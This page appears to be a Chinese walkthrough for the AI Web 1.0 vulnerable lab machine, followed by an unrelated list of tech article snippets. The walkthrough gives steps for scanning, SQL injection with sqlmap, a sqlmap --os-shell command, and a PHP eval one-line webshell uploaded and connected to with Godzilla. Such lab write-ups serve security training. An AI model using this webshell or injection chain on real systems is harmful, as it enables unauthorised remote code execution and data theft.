AI Web 1.0 靶机攻略

embedded/2024/10/18 18:27:26/

1、启动靶机

2、打开御剑,扫描端口,得到AI Web 1.0靶机IP

3、扫描目录

4、查看192.168.253.128/robots.txt

5、进一步扫描

/m3diNf0/

6、查看192.168.253.128/m3diNf0/info.php

8、扫描se3reTdir777,发现index.php

9、开始抓包

10、将抓到的包放到2.txt中,使用sqlmap进行sql注入

得到库名

得到表名

得到列名

再看userName和password

11、由info.php得知绝对路径,以此运行--os-shell来远程访问

python3 sqlmap.py -r 2.txt的路径 --os-shell

12、输入绝对路径/home/www/html/web1x443290o2sdf92213/se3reTdir777/uplo
ads/

13、上传一句话木马

echo "<?php @eval(\$_POST[cmd]);?>" >1.php

 14、用哥斯拉成功连接到木马


http://www.ppmy.cn/embedded/88929.html

相关文章

git 鉴权失败

这条错误信息通常出现在使用Git进行远程操作时&#xff0c;比如克隆仓库、拉取更新或推送代码。错误的含义是&#xff1a; HTTP Basic: Access denied&#xff1a;访问被拒绝。The provided password or token is incorrect&#xff1a;提供的密码或令牌不正确。Your account …

MySQL:行级锁

MySQL中的行级锁是数据库锁机制中粒度最细的一种&#xff0c;它只锁定事务需要修改的数据行&#xff0c;而不是整个表或数据库。行级锁能够显著提高数据库的并发性能&#xff0c;减少锁冲突。 行级锁的类型 MySQL中的行级锁主要有以下几种类型&#xff1a; 记录锁&#xff08…

使用Micronaut构建高性能微服务

使用Micronaut构建高性能微服务 大家好&#xff0c;我是微赚淘客系统3.0的小编&#xff0c;是个冬天不穿秋裤&#xff0c;天冷也要风度的程序猿&#xff01;Micronaut是一个现代化的Java框架&#xff0c;用于构建高性能、易于维护的微服务。它在设计时考虑了低内存消耗和快速启…

C#实现数据采集系统-系统优化服务封装

系统优化-服务封装 现在我们调用modbustcp和mqtt都直接在Program,所有加载和功能都混合在一起,比较难以维护 类似asp.net core项目的Program.cs代码如下,构建服务配置和启动 要实现的效果,Main方法中就是一个服务启动,只需要几行代码 分析代码 这里分成两部分,一…

k8s笔记之创建Istio Gateway规则

创建Istio Gateway 背景如何创建Istio Gateway规则配置方式rewrite重写路径直接去除match&#xff0c;默认都转发到一个服务路由规则多种配置方式实践&#xff08;即开头的完整版&#xff09; 涉及的命令补充注意事项 背景 为什么需要使用到Istio Gateway&#xff1f;充当k8s服…

vulhub:nginx解析漏洞CVE-2013-4547

此漏洞为文件名逻辑漏洞&#xff0c;该漏洞在上传图片时&#xff0c;修改其16进制编码可使其绕过策略&#xff0c;导致解析为 php。当Nginx 得到一个用户请求时&#xff0c;首先对 url 进行解析&#xff0c;进行正则匹配&#xff0c;如果匹配到以.php后缀结尾的文件名&#xff…

springCloud组件专题(五) --- seata

一.Seata介绍 1. seata是什么 是一款开源的分布式事务解决方案&#xff0c;供了 AT、TCC、SAGA 和 XA 事务模式。 2.分布式事务中的概念 2.1. 二阶段提交 二阶段提交的含义就是将事务的提交分成两个步骤&#xff0c;分别为&#xff1a; 准备阶段&#xff1a;事务协调者询问所…

JAVA基础知识点3 (String 和 StringBuffer 以及 StringBuilder 的特点以及区别)

1&#xff0c;String 和 StringBuffer 以及 StringBuilder 的特点 &#xff08;1&#xff09;String的特点&#xff1a;String是final修饰的字符序列是不可改变的&#xff0c; 是字符串常量&#xff0c;一旦初始化就不可以被更改,因此是线程安全的 因为是常量每次对其操作都会…